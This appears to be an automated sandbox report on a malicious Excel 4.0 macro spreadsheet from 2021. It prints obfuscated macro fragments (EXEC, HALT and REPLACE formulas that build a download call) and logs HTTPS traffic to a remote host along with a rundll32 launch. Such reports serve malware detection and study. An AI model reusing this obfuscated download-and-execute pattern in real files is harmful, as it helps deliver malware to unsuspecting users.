,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,=EXEC(Doc1!AD15&Doc2!AF7&Doc1!AF15),,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REPLACE(Doc2!AD25,7,7,""nloadTo"")",,,"=REPLACE(AH23,7,7,"""")",,,"=REPLACE(Doc2!AD3&Doc2!AD4&Doc2!AD5&Doc2!AD6&Doc2!AD7,7,7,""l3"")",,URL,
Network Behavior |
---|
Network Port Distribution |
---|
- Total Packets: 16
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 15, 2021 15:49:13.791960001 CET | 49167 | 443 | 192.168.2.22 | 217.26.213.91 |
Feb 15, 2021 15:49:13.864586115 CET | 443 | 49167 | 217.26.213.91 | 192.168.2.22 |
Feb 15, 2021 15:49:13.864792109 CET | 49167 | 443 | 192.168.2.22 | 217.26.213.91 |
Feb 15, 2021 15:49:13.885714054 CET | 49167 | 443 | 192.168.2.22 | 217.26.213.91 |
Feb 15, 2021 15:49:13.957506895 CET | 443 | 49167 | 217.26.213.91 | 192.168.2.22 |
Feb 15, 2021 15:49:13.958545923 CET | 443 | 49167 | 217.26.213.91 | 192.168.2.22 |
Feb 15, 2021 15:49:13.958592892 CET | 443 | 49167 | 217.26.213.91 | 192.168.2.22 |
Feb 15, 2021 15:49:13.958631039 CET | 443 | 49167 | 217.26.213.91 | 192.168.2.22 |
Feb 15, 2021 15:49:13.958635092 CET | 49167 | 443 | 192.168.2.22 | 217.26.213.91 |
Feb 15, 2021 15:49:13.958659887 CET | 443 | 49167 | 217.26.213.91 | 192.168.2.22 |
Feb 15, 2021 15:49:13.958667994 CET | 49167 | 443 | 192.168.2.22 | 217.26.213.91 |
Feb 15, 2021 15:49:13.958676100 CET | 49167 | 443 | 192.168.2.22 | 217.26.213.91 |
Feb 15, 2021 15:49:13.958710909 CET | 49167 | 443 | 192.168.2.22 | 217.26.213.91 |
Feb 15, 2021 15:49:13.959661961 CET | 443 | 49167 | 217.26.213.91 | 192.168.2.22 |
Feb 15, 2021 15:49:13.959738970 CET | 49167 | 443 | 192.168.2.22 | 217.26.213.91 |
Feb 15, 2021 15:49:13.968462944 CET | 49167 | 443 | 192.168.2.22 | 217.26.213.91 |
Feb 15, 2021 15:49:14.040692091 CET | 443 | 49167 | 217.26.213.91 | 192.168.2.22 |
Feb 15, 2021 15:49:14.040833950 CET | 49167 | 443 | 192.168.2.22 | 217.26.213.91 |
Feb 15, 2021 15:49:15.056469917 CET | 49167 | 443 | 192.168.2.22 | 217.26.213.91 |
Feb 15, 2021 15:49:15.167438030 CET | 443 | 49167 | 217.26.213.91 | 192.168.2.22 |
Feb 15, 2021 15:49:15.558629036 CET | 443 | 49167 | 217.26.213.91 | 192.168.2.22 |
Feb 15, 2021 15:49:15.558676958 CET | 443 | 49167 | 217.26.213.91 | 192.168.2.22 |
Feb 15, 2021 15:49:15.558857918 CET | 49167 | 443 | 192.168.2.22 | 217.26.213.91 |
Feb 15, 2021 15:49:15.561418056 CET | 49167 | 443 | 192.168.2.22 | 217.26.213.91 |
Feb 15, 2021 15:49:15.632994890 CET | 443 | 49167 | 217.26.213.91 | 192.168.2.22 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 15, 2021 15:49:13.711478949 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 15, 2021 15:49:13.768529892 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Feb 15, 2021 15:49:14.401218891 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 15, 2021 15:49:14.452872992 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Feb 15, 2021 15:49:14.496109962 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 15, 2021 15:49:14.545005083 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 15, 2021 15:49:13.711478949 CET | 192.168.2.22 | 8.8.8.8 | 0x1168 | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 15, 2021 15:49:13.768529892 CET | 8.8.8.8 | 192.168.2.22 | 0x1168 | No error (0) | 217.26.213.91 | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Feb 15, 2021 15:49:13.959661961 CET | 217.26.213.91 | 443 | 192.168.2.22 | 49167 | CN=darmatic.co.rs CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Sat Jan 16 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004 | Sat Apr 17 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b |
CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Mon May 18 02:00:00 CEST 2015 | Sun May 18 01:59:59 CEST 2025 | |||||||
CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
Start time: | 15:48:40 |
Start date: | 15/02/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f020000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
File Activities
Section Activities
Registry Activities
Mutex Activities
Process Activities
Thread Activities
Memory Activities
System Activities
Timing Activities
Windows UI Activities
Network Activities
Object Security Activities
LPC Port Activities
Start time: | 15:48:45 |
Start date: | 15/02/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff5b0000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
File Activities
Section Activities
Registry Activities
Mutex Activities
Process Activities
Thread Activities
Memory Activities
System Activities
Timing Activities
Windows UI Activities
LPC Port Activities
Disassembly |
---|
Code Analysis |
---|